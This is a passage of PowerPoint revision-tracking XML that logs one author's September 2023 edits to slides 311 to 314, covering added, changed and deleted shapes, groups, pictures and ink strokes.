        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:28.939" v="10611" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:spMk id="2" creationId="{84CC6E10-C9BD-DE40-A7A4-96F9A11768FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:37.878" v="10612" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:spMk id="5" creationId="{FC8E5FAC-FD1D-3ECD-182C-BEEF265DDED8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:56:28.650" v="10564"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="8" creationId="{01CF10B2-419E-71AA-28D5-97D6A987C72E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:16.986" v="10571"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="11" creationId="{286A519F-52C8-C75C-55A4-9B54B77AE911}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:21.083" v="10574"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="15" creationId="{C3ECCF77-3FDA-C27C-5A6B-C85958C98D75}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:24.576" v="10578"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="18" creationId="{85733A99-73F4-9D8A-86D8-9B46B767AFA2}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:26.494" v="10580"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="22" creationId="{1E227628-B1F3-87EE-0689-84F21D15017D}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="24" creationId="{47A09CEF-E743-2413-9DDB-AFB73646589C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="27" creationId="{98ACAEB4-94A8-E711-3329-5AB3891B1CB2}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:36.606" v="10588"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="30" creationId="{83A69EC0-4ED5-D04B-0940-BF44549C4475}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:44.904" v="10596"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="35" creationId="{9CF3BB53-7A28-ED2C-6041-F1B447E9F8CB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="43" creationId="{ACFA83EE-E59B-83E1-8BE8-FF09353EED02}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:grpSpMk id="49" creationId="{0221EBC4-4596-6C8C-4537-7B9242697647}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-22T23:43:30.767" v="8504" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:picMk id="3" creationId="{E6AD9C20-999A-C19E-2150-0192A7826264}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:56:22.523" v="10561" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="4" creationId="{3DDAAB5C-1DCD-52D9-1C91-AE7EE07CAD3A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:56:28.650" v="10564"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="6" creationId="{C84CEB0F-12FB-1828-80A1-BF1CF22DD6D7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:56:28.650" v="10564"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="7" creationId="{8AAE7CEB-56B1-7DAF-4AA0-5F1F486D0F87}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="9" creationId="{EBA8673B-945D-4F6A-FAE5-9EE8E1C67C6E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="10" creationId="{040B67FE-2740-2816-9FC6-8A2F2B39E20B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="12" creationId="{CECD0AEF-5D1D-80F3-7E8E-BA77C8002160}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="13" creationId="{A92CF825-2259-3B5C-D6B2-ACDC867FFBB1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="14" creationId="{0C8360D0-F070-AC75-B614-89ECBC4D4FAB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="16" creationId="{C906588C-08DC-F28C-0D07-A1C197D86467}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="17" creationId="{0E63A1DD-804E-0B22-82D9-EC57E64E151B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="19" creationId="{DFFE6748-9132-53B1-ADC5-76C7D15BF453}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="20" creationId="{AC53250B-D6CF-5DF3-A7E8-6B475A8036DD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="21" creationId="{079A2768-87FE-06E1-71A4-4FF85C76A1AB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="23" creationId="{B61EEE65-3E49-7CE3-66BC-4B5BDA7FE44A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="25" creationId="{E7501411-1D0B-18B4-B278-A332912CA9C9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:31.157" v="10583"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="26" creationId="{A6550468-F287-55CB-63A3-C5E6115A4984}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:37.004" v="10589" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="28" creationId="{0D1B866A-B243-8F97-D287-D472ABCC6C0F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:36.606" v="10588"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="29" creationId="{9DDB6853-004A-02BA-4C31-1CFEC1ADBC74}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:41.011" v="10593" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="31" creationId="{8262C17B-C4D7-1BE7-CF7B-21838B3E813E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:40.602" v="10592" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="32" creationId="{F81C7186-C869-48CC-4FE2-1D0A96E8F845}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:44.904" v="10596"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="33" creationId="{BB7B8AF2-D6D2-9C53-DB7B-D07771BC9C3C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:57:44.904" v="10596"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="34" creationId="{0C17051B-87E3-B63E-D6E6-CC21BDB071AF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="36" creationId="{917412C7-1F86-F9C0-328C-F6616133064C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="37" creationId="{B0DF1624-ECBD-C13A-8ADE-F35390B5C394}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="38" creationId="{7E7A39B5-A3B4-646B-9D20-D6C5970D0F18}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="39" creationId="{353249B5-7FFD-9304-A625-68E3599AA03F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="40" creationId="{2AEAD442-151B-77B3-3484-C85CEF437BBE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="41" creationId="{9C86D8E9-FA5A-D38B-D4B6-793C2ED6363E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="42" creationId="{256BF7D5-1F68-23B6-4CE6-9AD6D57420CC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="44" creationId="{BF97782F-F380-FAE6-5CB2-84A8FEB7B834}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="45" creationId="{6D0BD544-748E-BF37-1C18-95960E5146E7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="46" creationId="{25E15FB2-DA12-C6FD-1226-67DFBF3681DA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="47" creationId="{A79BB578-26E6-49C3-7FB2-310921CE3B32}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:04.130" v="10610"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2156313096" sldId="311"/>
            <ac:inkMk id="48" creationId="{B4731DC6-86DF-D961-F6FD-A5A85EAB8D7F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:02:44.134" v="10787" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3601075108" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:02:44.134" v="10787" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3601075108" sldId="312"/>
            <ac:spMk id="2" creationId="{065E4D6B-D8C7-3A47-03B3-287E0B55F499}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T00:30:05.907" v="8519" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3601075108" sldId="312"/>
            <ac:picMk id="3" creationId="{6811F2B2-B848-ECED-95A4-565806886427}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:03:32.461" v="10797" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194299037" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:03:32.461" v="10797" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194299037" sldId="313"/>
            <ac:spMk id="2" creationId="{621491E1-6F68-3C42-6796-9744A3FBA177}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T02:03:19.664" v="10788" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194299037" sldId="313"/>
            <ac:spMk id="3" creationId="{91461A8D-8C8B-CBC1-2C00-14CC9F2C3D75}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:27:10.082" v="9459" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4064362086" sldId="314"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:37:28.526" v="8989" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="2" creationId="{7E774299-AC49-52F1-E83A-1F79B84E9282}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:39:31.950" v="9005" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="6" creationId="{9B6D0957-D0CC-3F0D-DEBD-5001398A6759}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T02:17:22.017" v="9041" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4064362086" sldId="314"/>
            <ac:spMk id="8" creationId="{09436D9B-9245-96A2-5272-A7C0E6C39DDC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
